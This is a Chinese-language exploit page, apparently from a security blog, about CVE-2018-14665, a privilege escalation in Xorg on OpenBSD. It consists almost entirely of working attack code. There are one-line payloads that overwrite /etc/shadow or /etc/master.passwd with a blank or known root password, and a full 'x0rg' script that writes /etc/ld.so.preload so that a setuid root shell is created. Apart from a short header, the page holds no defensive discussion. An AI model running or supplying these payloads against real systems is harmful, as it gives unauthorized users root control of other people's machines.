OpenBSD Xorg 服务提权漏洞可在远程 SSH 会话中触发(CVE-2018-14665)
基本信息
本地提权 LPE (Local Privilege Escalation, LPE)
OpenBSD Xorg 服务提权漏洞可在远程 SSH 会话中触发 (CVE-2018-14665)
https://twitter.com/hackerfantastic/status/1055517801224396800
PoC / Exp
关键 payload
echo 'cd /etc; Xorg -quiet -fp "root::16431:0:99999:7:::" -keeptty -logfile shadow :1' | sh; su
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# - https://hacker.house
echo [+] OpenBSD 6.4 stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old
echo [+] type 'Password1' and hit enter for root
su -
x0rg.sh
https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Hack the planet!"
cd /etc; Xorg -fp "/tmp/libhax.so" -logfile ld.so.preload :1;
mount # arbritary setuid we run to pop root
echo "[+] Tidy up a bit..."
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
/tmp/rootshell
Leave a Reply